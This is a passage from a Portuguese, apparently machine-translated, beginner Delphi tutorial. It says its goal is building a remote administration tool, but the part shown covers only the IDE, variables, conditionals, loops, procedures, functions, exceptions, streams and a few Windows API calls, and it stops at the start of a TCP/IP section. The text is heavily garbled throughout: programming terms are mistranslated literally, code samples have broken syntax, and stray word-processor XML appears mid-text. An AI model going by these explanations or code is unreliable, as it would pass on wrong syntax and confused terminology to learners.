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longo deste papel você ganhará o conhecimento de como programa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ramenta de administração remota. Este papel foi projetado para Delphi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o desenvolvimento de aplicação de correnteza de Borland (RAD) ambiente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ão tem uma cópia de Delphi, você pode carregar Delphi 7 Arquit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ativa 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borland.com/products/downloads/download_delphi.htm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papel é compatível com versões mais cedo de Delphi, enquanto inclui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ões 5 e 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que você obteve uma cópia de Delphi, deixa codificação de começo.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é novo a Delphi que eu recomendo começar aqui ao nov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, caso contrário você poderia saltar à frente à seção princip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DE NOVA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seção lhe dará o groundings para trabalhar durante este pap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recomendado que você tente cada conceito novo encontrado e qu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completou esta seção, você deveria poder programar um mes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 de Client/Server simp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ELPHI ID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a sua cópia de Delphi. O que você vê aqui é o Delphi IDE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os para Ambiente de Desenvolvimento Integrado. É dividido em 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s: A barra de título que contém o toolbars e o Compon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ta, o Inspetor de Objeto, o Objeto TreeView, e o workspa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e mostrará Form1 agora para. Você pode fechar o Obj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eView porque nós não estaremos usando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ORKSPAC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cialmente mostrado no workspace é um Form1. Esta é a For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enhista onde você projeta o olhar do Forma de sua aplicação. Lev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pad, WordPad, caixa de diálogo, Calculadora etc, estes são todos os exempl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formas (ou janelas). Só atrás do Desenhista de Forma é o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que é onde nós estaremos digitando nosso código par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. Para aba entre o dois uso F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PRIMEIRO PROGRAM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adquira cabo da extremidade do Form1 e arraste ao taman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quer. Agora isto é onde o Inspetor de Objeto entra em jog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há uma gota abaixo cardápio ao topo do Inspetor de Obj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diz Form1. Isto significa, as Propriedades e abas de Eventos há pou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aixo de está exibindo as Propriedades e Eventos de nosso Form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leve seu cursor de rato e traga até a barra de título e em cima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 Paleta de Componente. A Paleta de Componente é o lugar com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ão, Adicional, Win32 etc abas. Clique o componente de Bot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o um com o ‘OK texto de ' nisto. Agora clique em algum lugar em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e para colocar um Botão em lá. Economize sua aplicação neste momen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e, Salve Tudo, selecione um lugar satisfatório, clique economize para Unit1, agor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1 será seu .EXE nomeiam, assim você poderia querer digi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FirstProgram ' e economiz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que Projeto da barra de título e Compile Todos os Projetos. Isto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e um segundo porque quer dizer que está acontecendo aqui, o compilador de Delph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convertendo seu projeto em um arquivo executável compil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compilando todos os dados naquele projeto em alg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ador pode entender o deixando com arquivo de .EXE estar de pé-só. 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sta de papéis onde você salvou isto e corre seu FirstProgram.ex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não é muito. Clicando o botão na realidade não faz nada.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icamente há pouco o esqueleto de uma aplicação de Windows com uma dro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toe nisto. Deixa faça fazer al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e para Delphi, selecione sua Forma, e deixa objeto pegado um olhar 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s. Trabalhando com o Inspetor de Objeto aqui, enrole at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de Legenda e em cima de escreva para o ‘Form1 ' com ‘FirstProgram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ar a legenda da Forma. Faça o mesmo com o Botão, mas mudan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legenda para ‘Click eu '. Agora escrever algum código - selecione o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que será nomeado Button1) e clica a aba de Eventos do Obj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petor. Selecione o evento de OnClick, e digite um nome par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no espaço branco. O nome é sua escolha, algo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WhenButton1IsClicked ' estará bem e então imprensa ent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saltamos agora ao Editor de Código e nosso Unit1.pas tem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s seguintes somara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WhenButton1IsClicked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não precisa saber as complexidades do código inteiro agora para, você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precise saber que tudo que nós programamos entre o comece e termin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á executado quando o Botão fez tique-taque pelo usuário a runti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time é quando o .EXE estiver correndo ao invés de desígnio-tempo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o no qual nós somos ago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esta linha entre o comece e termine: Mundo de ShowMessage(‘Hello! ‘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ile seu projeto (Projeto, Compile Todos os Projetos), e então vai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a e veja o que acontece quando você clicar seu Bot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um pequeno mais interessante. Dê uma olhada no código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ria estar se parecendo alg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WhenButton1IsClicked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do de ShowMessage(‘Hello! ‘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não precisa recuar o ShowMessage enfileire, mas é bom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ability para quando seu código começa a crescer. Outra coisa para no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o nome do Evento de OnClick de nosso Button1. Nós chamamos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WhenButton1IsClicked ' mas qualquer nome teriam feito, há pouco é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Evento. Também, Delphi poderia não ser nenhum caso sensív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HOWMESSAGE.. estaria bem) mas outro comumente gorjeta de practised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çar cada palavra com uma letra maiúscula. Eu não entrarei em detalh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só objeto pegado nota ao longo deste guia do formato de nosso códi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NTÁRI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ntários são linhas de texto em sua Unidade que não faz de f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quer coisa e há pouco está lá para referência. Aqui são alguns exemplos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ntários em Delph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dobro atrás golpe é um modo de comen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aqui nós temos outro comentário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comentário está dentro de um par de suspensórios ondulad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é o exemplo aci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podem ser úteis se você quiser notar algo abaixo em sua Unidade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lembrança. Note que se você vê suspensórios ondulados usados com um dólar sin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o ‘{$R * .dfm} ' que está em seu Unit1 no momento, ist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os é um compilador diretivo. Directives de compilador são al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não estaremos us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I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ás para nosso programa, você terá notado há mais a isto que há pou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nClick evento manipulador de nosso Botão mas isso será explicado ma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tarde. Só nota que seu código principal será contribuição na seção de implementa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 declarar variáveis antes de eles pudessem ser usados e você decl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debaixo da palavra chave de var (a menos que eles sejam globais que que nós vir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posterior). Deixa posto algumas variáveis no Evento de OnClick de nosso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WhenButton1Clicked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One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Two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sult: inteireza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berOne := 10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berTwo := 5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sult := NumberOne + NumberTw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Message (' O resultado desta soma = ' + IntToStr(TheResult)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eu explicarei o que vai em aqui. A seção de var é onde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declarando que nós vamos estar usando três variáveis de tip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ireza. Um inteireza é um número - tente dactilografia inteireza de ‘' em sua Unida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F1 urgente para expor a ajuda de Delphi. Isto mostrará a ga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lguns outros tipos de variáveis. A ajuda de Delphi pode ser muito úti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quanto você está desenvolvendo suas aplicaçõ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a seção de var sempre vem antes o comece e depois do procedimento ou palavras chaves de função (palavra chave: uma palavra reservou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ilador de Delphi, I.E você não pode chamar uma variável comece, termine, procedimento etc) e você nomeia valores e os usa no código prin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. O bloco de código principal é entre o comece e termin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cada linha no bloco de código principal fins com um semi-cólon.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i-cólon indica o fim de uma declaração. Deveria estar boni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 o que vai em lá. O ‘:= ' é uma taref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e, assim você está dando para NumberOne o valor de 10. Então você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5 nomeando para a NumberTwo inteireza variável, e então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sult nomeando que o valor das outras duas variáveis som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inha final aqui exibições uma exibição de caixa de mensagem: O resultad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soma = 15. Você vê se você tinha posto o TheResult variável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ala marca você teria algo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O resultado desta soma = TheResult '. Assim você precisa fazer o +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dor para dizer soma este conteúdo variável. Também, eu use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ToStr () como você há pouco uma variável de inteireza não pode exibir naquele tip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ituação, você precisa converter isto a um tipo de fio de variáv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são alguns outros tipos variáveis com exempl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–UM fio algo está como abc123 de ‘?&gt; &lt;;xzs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usque - Isto um único caráter como ‘é UM ' ou ‘3 ' ou ‘?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lean–UMA variável de Boolean pode igualar Verdadeiro ou Fal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ENTÃO OUTR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xa começo um projeto novo (Arquivo, Novo, Aplicação) e lug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s: um Botão, um Rótulo e um Memorando em sua forma. Eles enlatam tu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achado debaixo da aba Standard da Paleta de Componente. Agora dob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tique-taque em seu Botão. Este é um atalho a fazer o antes do qual nós fiz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cria código de manipulador de evento para o evento de OnClick deste Botão, m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tempo é determinado o nome de falta Button1Clic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e para sua Forma e jogue aproximadamente com seus componentes, enquanto classificando segundo o taman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cionando etc, e confirma algumas das propriedades deles/delas. Você pode fix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de Fonte, colour de fonte e classifica segundo o tamanho, colour do Memorando, som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ollBar para o Memorando–tudo são mudanças de desígnio-tempo. Deixa faça algu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time muda–Volte para sua Unidade e ponha neste códig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: fi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:= ' Esta é nossa legenda nova. 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abel1.Caption = ' Label1 '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1.Caption := s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legenda de Label1s foi mudada!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nosso se declaração–nós estamos dizendo se a condição for então Verda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cute o bloco de código abaixo marcado com o novo comece e termin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ndição é entre o se e as palavras chaves de então, e por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egenda do Rótulo iguala ‘Label1 ' (se você não se mex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isto) o código é executado dentro do bloco de código novo. O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executado espetáculos como você acrescentaria uma linha a um Memorando (você preci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r o nome do Memorando, Memo1 neste caso) e a mudança de legen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táculos como fazer um runtime mude à propriedade de Legenda. Esten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conceito, nós podemos somar um outro se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: fi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:= ' Esta é nossa legenda nova. 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abel1.Caption = ' Label1 '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1.Caption := s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legenda de Label1s foi mudada!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Nós estamos dentro o outro seção de nosso código.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K nota agora que nós há pouco tomamos o semi-cólon do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o outro. Isto é porque quando você usa um ‘; ' em um fim;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as o fim de um bloco de código. Nós não queremos terminar o bloco de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 porque nós queremos associar o outro seção dentro d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. Bem isso deveria estar bem claro, deveria compilar e deveria correr isto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o que acontece - você provavelmente pode trabalhar fora por que. Depois de clicar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toe uma vez, nós mudamos nossa legenda de Rótulos claro que, assim qu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clica isto em uma segunda vez, o se condição avalia para Falso (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iel, não iguala ‘Label1 ') e o outro seção é executa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o outro comece e termine; - Esses começam e terminam pedaços puder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areç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outro comece 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só é demonstrar como Delphi não é nenhum caso sensível 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açando entre código não importa. Eu prefiro o modo nós fixamos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fique fora em nossa Unid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xa introduza um Edite componente. Leve um e vista em algum lug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Forma (aba de Padrões novamente–paire seu cursor em cima dos ícones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ta de Componente durante um segundo para se aparecer o nome de componente). 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ás para a Unidade e muda o código como segue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:= StrToInt(Edit1.Text); se i&gt; 10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Edit1 é maior que 10.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isnt de Edit1 maior que 10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 isso. Note que se você tem qualquer coisa mas um número dentr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e Componente você adquire um erro. Isso é porque nós estamos converte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údos do Edita em um inteireza tipo variável assim nós podemos nome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para ‘i '. Nós fazemos esta conversão que usa o StrToInt funcione (nós v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ha depois a funções). Edit1.Text está dizendo a propriedade de Text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1. Dê uma olhada nisto no Inspetor de Objeto, dirá Edit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omento, mas você pode apagar isso. O resto se explica–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(o valor em Edit1) é então maior que 10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introduzimos o maior que o operador aqui (&gt;). Debaixo de é algu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s operadores que você pode usa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MÁTICO: + (some), - (subtraia), * (multiplique), div (divid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ÓGICO: e: se (i = 6) e (ii = 5)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: se (i = 6) ou (ii = 5)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UALDADE: &gt; (maior que), &lt;(menos que), = (igual para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&gt; (não igual para), &lt;= (menos que ou iguala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= (maior que ou igual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Não confunda a tarefa operador ‘:= ' com igual a ‘=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NHADO SE DECLARAÇÕ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segue um se declaração com outro se declaração, isto é di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r aninhando ifs. Você normalmente faria isto porque você qu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rme alguns condições em algo. Aqui é uma modificação par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 para demonstra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:= StrToInt(Edit1.Text); se i&gt; 10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i = 15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O valor de i é 15! * *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Edit1 é maior que 10.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isnt de Edit1 maior que 10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que. Assim se “i” é maior que 10, então nós entramos no primeiro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 onde outro se declaração é conferida. Se aquela declaraçã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ifique, então nós entramos que se bloco de código. Quando nós deixamos aquele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queie a seu fim; - nós ainda vamos executar o diretório de li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aixo disto porque é parte de nosso primeiro bloco de código (porque i e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or que 10), mas nós deixaremos isto lá–nós saltamos o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N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ordem é uma coleção de valores. É uma variável, mas às vez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lugar de usando 5 variáveis de fio, você poderia querer usar uma ord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fio de tipo segurar todos os 5 fios. Aqui é um exemplo de declar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: array[0 ..4] de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lá você declarou a ordem na seção de var, e você t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do vai conter 5 fios. Você vê *Object Pascal *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ns (como com muitas outras linguagens de programação) é zero-baseado, ass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 seriam seu primeiro índice de ordem (eles não têm que ser entretant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Object Pascal *–Este é o idioma no que nós estamos codificando a propósi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podemos estar usando Delphi que é o pacote inteiro - Componentes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, mas o código atual é Objeto Pasc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ão aqui é como você nomearia fios àquela orde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[0] := ' Este é nosso primeiro fio no array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[1] := ' Este é nosso segundo fio no array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[2] := ' Este é nosso terceiro fio no array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[3] := ' Este é nosso quarto fio no array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Array[4] := ' Este é nosso quinto fio no array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para trabalhar com um certo fio, você usaria há pouco o nome de ord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yArray) e o índice do fio que você quer dentro de suspensórios. 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‘Data no terceiro índice de ordem: ‘+ MYARRAY[2]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A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as são usadas quando você quiser fazer algo uma certa quantia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s, até que uma condição é conhecida, ou por vários outras razõ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três tipos principais de voltas, o porque, o tempo, e a volta repetida. Nós discutiremos cada separad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RQUE VOLT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ito comumente usado. Comece um projeto novo e ponha um Memorando e Abotoe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Forma. Programe o evento de OnClick do Botão como segue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Clear; {Isto clareia o Memorando. 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int := 1 a 10 faz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int) + ' tempos pela volta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somei um comentário aqui para o deixar saber o que aquela declaração faz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o que temos nós? –Nós estamos dizendo que 1 a 10 fazem o dentro do qual é o comece e termine; logo após o faça. A primeira vez ao redor nós so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 de ‘nomeando ' com 1 e cada tempo pela volta depois diss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 de ‘que ' é incrementado antes da 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TA DE TEMP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ta de tempo dará laçada enquanto uma condição for Verdade. Uma vez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go de condição é Falso, as saídas de volta.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Clear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 := 1; enquanto int &lt;&gt; 10 faz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int) + ' tempos pela volta.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(int); {Isto incrementa int antes da 1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dará laçada por 9 vezes como a 9ª vez por int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ementado pela 1 e assim iguala 10. Claro que a condição fixou aqu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enquanto int não for (&lt;&gt;) 10 assim quando iguala 10, então condiçã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a Falso e a volta exis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TA REPETID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 parecido para enquanto volta mas a condição é conferida ao términ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ta, em lugar de no princípio como na volta de tempo. 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ita {nós teríamos incrementado int antes da 1 logo antes a repetição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int) + ' tempos pela volta.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(int); até int = 10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bem direto. Substitua o tempo, faça, comece,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da volta de tempo com aquele código para test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Se você usa ‘Break; ' em algum lugar em uma volta que termin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lta–saída a volta àquele ponto de Fratu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ÕES E PROCEDIMENT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é um ponto importante como funções e procedimentos fará as paz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rpo de nossos programas. Elas são rotinas para as quais podem ser chamad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cute uma tarefa específica sempre que é requeri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um Botão e um Memorando em uma forma e faça o olhar de OnClick de seu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Button1Click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Sobre chamar nosso procedimento..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loWorld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Nós retomamos aqui quando o procedimento tiver performed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' sua tarefa. '); / / Você poderia poder ajustar isto em uma linha. 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assim, esqueça o + pedaç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do ‘/ / ' é um comentário e dará no mesm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digo. Se você compila que, você adquirirá um Compile declaração de Erro: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dentifier de Undeclared ‘HelloWorld '. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">A caixa branca exib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aixo do Editor de Código mostra o compile erros. Deixa escrev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loWorld codifica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HelloWorld; comece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howMessage (' Oi mundo! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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aquele procedimento em algum lugar em sua Unidade depois do implementa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antes de o ‘final terminassem. '–talvez deixe uma linha depois de seu OnClic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e então pôs isto dentro. Agora tente e compile isso. OK, está imóv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clared porque nós escrevemos o código mas não declaramos que nós so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ndo este procedimento em nosso Form1. Você declara seus procedimentos dentr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1 classificam na seção de tipo de sua Unidade. Enrole para cima e você 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um exemplo–o procedimento do Botão. Só debaixo disso posto: procedimento HelloWorld; - logo antes a palavra chave priv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ficação em seu procedimento você tem ‘TForm1. ' mas não no procedi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ção. Isso é porque na declaração está declarando você que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 ser então um sócio da classe de TForm1 para te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ilador reconhece isto como isto, você precisa deixar isto saber usa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Form1. Não preocupe aproximadamente que para agora entretanto, só entenda com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fato declare e use o procedime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ile e teste que. Eu vou o presumir pode trabalhar fora o que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 em lá–só estudo o códi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rocedimento é uma rotina que não devolve valor (não fa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lva um valor de resultado). pode aceitar valores porém–que s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âmetros chamados. Este procedimento aceita um parâmetro de inteirez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DoubleIt(var ValueToDouble: inteireza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ueToDouble := ValueToDouble * 2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r para o procedimento aceitar um valor e poder mudar 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lie você precisa declarar isto como uma variável do tipo você quer ist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aceitar–inteireza em nosso caso. O nome pode ser qualquer coisa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há pouco um nome variável. Você faz este dentro de um par de parênte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mostrado. Aqui é como passar um parâmetro para este procediment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nteger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nteger := 5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bleIt(AnInteger); / / Aqui nós passamos ‘AnInteger ' a DoubleI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AnInteger)); / / Tente isto s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/ / IntToStr - o que acontec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não declarou este procedimento que você adquire um compile erro. Po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linha logo antes a palavra chave privada: procedimento DoubleIt(var ValueToDouble: inteireza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vai em? - ‘AnInteger ' é nomeado com 5 e então pass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procedimento de DoubleIt. O parâmetro de DoubleIt ‘ValueToDouble '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os uma referência para o ‘AnInteger o local de memória de variável de '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isco rígido. Se nós manipulamos ValueToDouble que aqui, nós multiplic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as 2–nós estamos manipulando AnInteg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Õ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mencionei que um procedimento não devolve valor.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 de diferença que uma função faz, e também pode aceitar parâmetr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2 Edita em sua Forma e um Botão. Aqui é nosso código de fun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 TForm1.Multiply(Int1, Int2,: inteireza)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:= Int1 * Int2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como sempre - seria esta linha (de função começar..): função Multiply(Int1, Int2,: inteireza): inteireza; (..bu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 ‘TForm1 ') - e cria um OnClick evento manipulador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toe com este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Value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1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2: inteireza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d1 := StrToInt(Edit1.Text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d2 := StrToInt(Edit2.Text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turnValue := Multiply(Ed1, Ed2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Lines.Add(IntToStr(ReturnValue)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 que. Você precisa pôr um número em cada obviamente Edite caixa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time. Em primeiro lugar, note não há nenhum var na fun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êntese de parâmet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é porque nós queremos poder passar números atuais bastante par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só variáveis como nós só pudéssemos ter feito com nosso procedi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. Também, esta função aceita dois parâmetros. A sintaxe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ite mais que um pararmeter é: (Vírgula de NameOfFirst NameOfSecon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lon DataType)–como mostrado em nossa função. Ao término de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cione nós temos o tipo de dados que vai ser devolvi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: inteireza ' quer dizer o Resultado de ‘que ' será de inteireza de tip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é Resultado de ‘': Isto é uma variável reservou para ser nomead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das ações de uma função. Tem que ser declarado igual a qualqu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variável, mas é declarado pelo compilador e não mostrado a você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amada de função celebrará o valor de retorno de certo modo. Assim s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ie uma variável com a chamada de função como nós fizemos aqu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Value := Multiply(Ed1, Ed2); - nós estamos dando isto o Result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. ‘Multiply(Ed1, Ed2) ' é nossa chamada de função e espetáculos como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 dois parâmetros–você há pouco separa cada com uma vírgul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ro que o ReturnValue conterá um valor de inteireza agora como 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isso que nossos lucros de função. Você não pode acrescentar inteirezas a um Memor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aceitará só fios assim nós temos que usar o StrToInt (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. Onde fez o StrToInt () função vem de? Nós não t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ficado isto. Isso está correto, e isso conduz em nosso próximo tópico -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os list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USOS LISTA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ão longe nós usamos há pouco uma Unidade em nossas aplicações. Você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ém some Unidades adicionais. Talvez você tem muitas rotin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cedimentos e funções) que você não quer ver dentro seu prin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 (a Unidade da Forma) porém você ainda precisa os chamar execu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refa específica deles/delas. Você poderia criar uma segunda Unidade e há pouco poderia encher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 com estas rotinas e então associar sua Unidade principal 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código só Unidade, você poria o nome disto na lista de us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role até o topo de seu Unit1.pas. A seção de usos é ond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o nome de uma Unidade que você gostaria de usar código de. T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–Arquivo, Novo, Unidade, e pôs seu Multiplique função em lá dentr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de implementação. A declaração aqui estaria na seção de interface, e nota você não precisa usar ‘TForm1. ' n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. Agora atrás para Unit1 e pôs Unit2 em algum lugar na lista de usos: Po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vírgula no fim da última unidade na lista e então soma ‘Unit2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contém uma biblioteca grande de funções pre-escritas, procedimento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todos, Objetos, Classes, Componentes (o Componente Vis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ry(VCL)) para nós trabalhar com. Você pode ver já há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cas unidades listaram na seção de usos como Windows, Mensagen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Utils para nomear alguns. Estes tudo contêm código no qual nós podemos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a aplica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ando ao StrToInt ()–paire seu rato em cima disto para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ndo. Se aparecerá uma declaração de linha é uma funçã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Utils.pas que é um das Unidades em nossa lista de usos. Ist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ícias boas porque uma pequena coisa como converter um fio para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ireza poderia levar uma página inteira ou mais de codificação, mas nós temos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funcione lá para nós usar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 para seu Unit1 e faça tique-taque de forma que seu cursor flamejando está em algum lug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cima de ‘StrToInt ' e imprensa F1. Isto expõe a ajuda que lhe fa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equeno sobre a função. Se uma caixa é exibida com duas escolha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seleto a função de StrToI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ver que devolve um inteireza. Você também pode ver acei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arâmetro de fio de tipo de dados. Diz a palavra chave de const. Agora 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mencione isto agora até, mas um tipo de const está como uma variáv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não pode ser mudado. O tipo de const foi usado nesta fun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o fio que aceita não será mudado–não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lver um valor diferente para o que nós passamos isto, é há pou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o converter os dados digitam para nó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juda de Delphi é muito útil por ter observado como trabalho de rotinas.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digo, há pouco ponha seu cursor fundamental em cima de um nome rotineiro e F1 bati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MAS OUTRAS ROTINAS ÚTEIS QUE NÓS ESTAREMOS USAND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viu StrToInt (), bem IntToStr () é há pouco o oposto. Debaix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algumas outras rotinas úteis. Se lembre, adquirir informações mais adia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tipo rotineiro no nome, selecione, e imprensa F1 em Delph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 (): Esta função devolve a posição (índice) de um fi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fio. Aqui é um retalho de código para ilustra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nteger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:= ' ABCDEFGH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NTEGER := POS (' D', S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PosInteger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ariável de PosInteger seria nomeada 4 aqui, como isso é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ção de ‘d ' em S. Você também poderia fazer algo assi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INTTOSTR (POS (' EF', S)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somará 5 ao Memorando como isso é a posição de ef de ‘' no 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re aqui. Eu deixei espaços entre os parênteses para claridade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pilador de Delphi ignora espaço de qualquer maneira. A partir do me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, o resultado daquela função está o ser passa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ToStr funcionam que aquele resultado está sendo exibido no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código é o modo preferido para fazer esta tarefa como é mais compac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onto para notar é, se havia mais de um ef de ‘' em S, Pos (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lva o índice da primeira ocorrência d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pia (): Esta função devolve uma cópia de uma certa parte de um f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ós declaramos outro fio ‘StringBit ' variável e usando o anteri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da codifique, nós poderíamos fazer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ringBit := Copy(S, 2, 5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Lines.Add(StringBi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unção de Cópia aceita três parâmetros. O primeiro em se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l de fio, segundo começa o índice donde você quer copi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, e o terço quantos caráter que você quer copiar d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nte onwards. Não confunda o terceiro parâmetro com outro índ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mos dizendo, comece às 2 (‘b ') e remove 5 caráter (para ‘f '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copia que mordeu. Nós adquirimos bcdef de ‘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ue (): UM procedimento que apaga uma seção de um fio. Se nós tivéss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ringVar que conteve ‘ThisStringWasAssignedToAStringVar ' e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ido remover o primeiro Fio de ‘' do fio. Nós podemos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u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AStringVar, 5, 6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AStringVar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Apague () parâmetros trabalham da mesma maneira como Cópia (). O primei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o o fio, segundo o índice, e o terço quantos cará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r junto no fio como o ponto apagar. Note, você pô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faça: Memo1.Lines.Add(Delete(AstringVar, 5, 6)); - como é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e lucros nenhum val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rimento (): Função que devolve o número de caráter em um f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elementos em uma ordem. Nós estaremos usando isto principalmente com fios. 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ringVar contém: ‘ThisStringWasAssignedToAStringVar '–e nós fazem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IntToStr(Length(AStringVar)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devolverá 33 como lá é 33 caráter em AStringV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 (): Nós já vimos este mais cedo assim inspeciona a ajud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. É um procedimento que incrementa um val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Exists (): Esta função confere se um certo parâmetro de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ado a isto existe em um disco rígido.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FileExists (' c:\file.txt ') = Retifiqu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arquivo existe!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arquivo não existe.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FileExists devolve um valor de Boolean–Verdadeiro se o arquivo exist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Falso se não fizer, nós podemos fazer o anterior conferir. O arquiv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ou poderia ter sido uma variável de fio que contém o nome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nho do arquivo, ou talvez FileExists(Edit1.Text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File (): Esta função é chamada da mesma maneira como FileExists (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rém removerá um arquivo de um disco. Se o arquivo fo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ado a função devolverá Verdadeiro. Se o arquivo não pode ser apag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não existe, a função devolve Fal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Windows é um ambiente evento-dirigido. Isto significa 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um evento acontecer, o Windows envia para um programa uma mensagem de Window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ndo o programa do evento que há pouco aconteceu. Isto pô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algo como um ser fundamental apertado, um rato que é clicado, movi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VCL (Biblioteca de Componente Visual–os componentes em Delph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ta de componente) são listados eventos debaixo da aba de Event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e o Inspetor. Estes são ‘ativou ' ou ‘despediram ' como resultad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ma ação no compon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já usamos o evento de OnClick de um componente de Botão.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digo gerou quando você cria que este evento é um método chamado um ev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ipulador. Está dando o evento–executando o código dentro d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ipulador de evento quando o evento é incendi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ê uma olhada em alguns dos outros eventos de sua Forma. Esqueç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ção, Controle Ativo etc–nós há pouco estamos olhando ao Em.. pedaç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fazer tique-taque em um evento particular e imprensa F1 para ter um olhar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juda para aquele evento. Aqui são alguns eventos comuns nós ser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lhando co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reate: Acontece quando a forma é criada inicialmente. Será dispar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 uma vez como é criada só uma vez a forma. Use este evento para faz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o que você gostaria de fazer quando a forma é cri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KeyDown: Se a forma é nossa janela ativa (em foco) e o usuár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rte uma chave, este evento é incendi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KeyPress: Semelhante ao evento de OnKeyDown mas este evento não fa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he dê a gama cheia de chav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r o manipulador de evento para um evento só tipo um nome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branca próximo ao evento e imprensa entra. Ou, você há pouco pô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nco dobro no evento que gerará um nome para você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não precisa responder por todos os eventos. Você há pouco poderia querer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como nós fizemos mais cedo com o OnClick. Estes poucos eventos que eu ten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mencionado é de nossa Forma, porém você vai bom muitos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s no VCL para ter os mesmos eventos (aparte de OnCreat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PLICAÇÃO DE JANELA QUE PROGRAMA INTERFACE (API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é uma coleção grande de funções de Windows escrita no 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ioma que nos dá funcionalidade extra quando nós não podemos adquirir ist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CL. Você faria o que é chamado uma chamada de API a uma função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ira usar. Você faz isto da mesma maneira como você chamaria qualquer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funcionam. Aqui é um exemplo de como você fecharia janel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ndo o ExitWindowsEx função de API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itWindowSEx(EWX_FORCE ou EWX_SHUTDOWN, 0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ela chamada fechará o Windows. Deveria ser usado como último recur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pudesse danificar dados potencialmente. Dê uma olhada na Microsof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mentador Network: www.msdn.microsoft.com - e procu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tWindowsEx. Eu mencionarei que outro API chama como nós vimos os us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HA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ós queremos usar fios em Windows funciona nós precisamos usar o que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ado um PChar. Você vê o Windows foi escrito na programação de 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ioma que não tem o tipo de dados de fio no que nós faz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e Pascal. Usa uma ordem de caráter como um fio. Ao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ordem de caráter há um zero (terminator nulo: 0)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 o fim do fio de caráter. Às vezes em Delphi, nós pod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trabalhando com um Windows função de API da que requer uma ord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áter como um parâmetro. Nós há pouco não poderíamos passar ist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re, ao invés, nós usaríamos um PChar. Aqui é um exemplo usa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 CopyFile chamada de AP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YFILE(PCHAR (' C:\FILE.BMP '), PCHAR (' C:\FOLDER\FILE.BMP '), VERDADEIRO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amente, tente procurando para cima CopyFile na Microsoft Fomentador Networ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informações sobre este API funcion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IS GLOBAI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variáveis que nós temos usado tão longe foram variáveis loca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são locais ao procedimento declarado dentro, então se você tivesse do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s, você não poderia usar variáveis declaradas dentr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o procedimento no segundo procedimento. Aqui é um exempl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e, há pouco ponha dois Botões em uma forma e um Memorand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Var: fi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Var := ' Fio nomeou ao StrVar' variável local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StrVar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trabalhará bom, como StrVar é declarado local a este procedime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nós tentássemos fazer o seguinte em nosso Button2 evento de OnClick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2Click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Var := ' deixa nomeie isto ao instead' de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StrVar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adquiriríamos um compile declaração de erro: Identifier de Undeclared: ‘STRVAR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deixe declarar StrVar então global (I.E–assim todo procedimento pode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). Você faz isto na seção privada de sua Unidade. Assim tire a seção de var de seu Button1 OnClick evento código e ao invés, ponh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StrVar na seção privada assi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Declarações privadas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Var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compile que e testa seus Botões. Você verá você pode us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l em qualquer procedimento agora como é global, não loc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NGLIS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pode ser pensado de como uma ordem de fios mas com som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. É o que é chamado um Objeto e nós usamos isto assi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: TStringList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 := TStringList.Create; / / Isto é como você cria a L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.Add (' UM fio acrescentou ao list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.Add (' Outro fio acrescentou ao list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SL.Tex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.Free; / / Aqui nós livramos isto de memó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nós declaramos isto então que nós criamos isto como mostrado. Nós podemos acrescentar fios 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o método de .Add, mas quando nós terminamos usando isto, nós deveríamos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étodo de .Free para livrar isto de memória de computad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ósito–ignore o ‘T ' mordeu, isto está dizendo que há pouco é um Obj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você não precisa saber que para agora. Aqui são algumas outras cois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fazer com um StringLis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Sort: Isto ordenará o StringList alfabetic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Clear: Clareia os conteúdos de um StringList. Não confunda com Liv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Count: UM método do que devolve um valor de inteireza do núme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s na lis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IndexOf: Lucros o índice da primeira ocorrência de um fio em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ngList. É zero-baseado, assim se o fio para o que nós estávamos olh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do o primeiro fio no StringList, seriam devolvidos 0. S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 não é achado na lista –1 é devolvi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LoadFromFile: Isto preenche a lista com os conteúdos de um tex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o fund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há pouco são lá agora para referência para. Você poderia usar a ajud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rme os exemplos e é se familiarizado com eles se você gostar–m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nós os encontramos que nós entraremos por eles em mais detalh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..EXCEP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tipo de declaração é um modo de manipulação de exceção. Pense atrás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programa onde nós tivemos um Edite caixa e um Botão, e quand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ado nosso Botão conferiu se o valor no Edite e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or que 10. Era um se, então, outro exemplo. Nós estávamos fazend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e à função de StrToInt, e se nós tivéssemos algo dentro nosso Edi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não converteu a uns dados de inteireza digite, então o Windows exib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erro. Superar estes erros de nos se aparecer podem mud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o de código a prova ..except ..end; declaração assi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: inteireza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{...TRY tudo aquilo ESTÁ ENTRE AQUI...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:= StrToInt(Edit1.Text); se i&gt; 10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Edit1 é maior que 10.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O valor em isnt de Edit1 maior que 10. '); fim; exclua {...AND HERE...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havia um erro. '); fim; {SE NÃO PODE FAZER ALGO–EXECUTE MENOS BLOCO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deveria ser compreensível. Há pouco responde pelo fato que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queira a mensagem de Windows que se aparece. Se não pode fazer al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rova menos bloco, como a StrToInt função chamada, entã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ção é executada ao invés - entre o salvo e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DE NO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usamos a falta nomeia tão longe de nossos componentes,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1 etc. Você pode porém, mude o nome do componente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de Nome. Derrube um Memorando em sua Forma e mude seu nome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Memo. Agora se você quisesse trabalhar com aquele Memorando que você te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o nome que nós nomeamos a isto. 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Memo.Lines.Add(‘Add isto para o Memorando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UXOS DE ARQUIVO E FLUXOS DE MEMÓRI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lhe permite usar Objetos de fluxo especiais para ler ou escreve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dio de armazenamento como um disco. O TFileStream lhe permite trabalh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arquivos e o TMemoryStream lhe permite armazenar dados dentro dinâmi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ória. Coloque 2 Memorandos, e um Botão em você Forma. Aqui é o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Click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Stream: TMemoryStream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Stream := TMemoryStream.Creat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Lines.SaveToStream(MemStream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Stream.Position := 0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2.Lines.LoadFromStream(MemStream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Stream.Free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nós estamos fazendo aqui está declarando um TMemoryStream chamado MemStre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eção de var. Então nós estamos criando o Objeto de MemoryStre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.Create). Nós estamos dizendo então economize todos os dados em nosso Memo1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Stream (isto economiza os dados como memória dinâmica em seu sistema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). Agora nós fixamos o *Position * propriedade atrás para o começ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MemStream. Nós usamos o método de LoadFromStream e carregamos os conteúd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nosso MemStream em nosso Memo2 e finalmente, livre nosso TMemoryStre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 livrar Objetos de Memória assim não desperdiçar Memó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urs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osition * - Esta propriedade pode ser usada para obter a posição at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byte número desde o princípio dos dados fluídos.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ante fixar a posição a 0 se nós queremos trabalhar com dados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ço para o fim dos dados fluí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preocupe muito se você não agarrou isso. Confira a ajuda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, e você verá outros exemplos como nós trabalhamos durante este pap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CP/I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rotocolo é basicamente um jogo de regras que permitem comunica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dois dispositivos. TCP/IP é 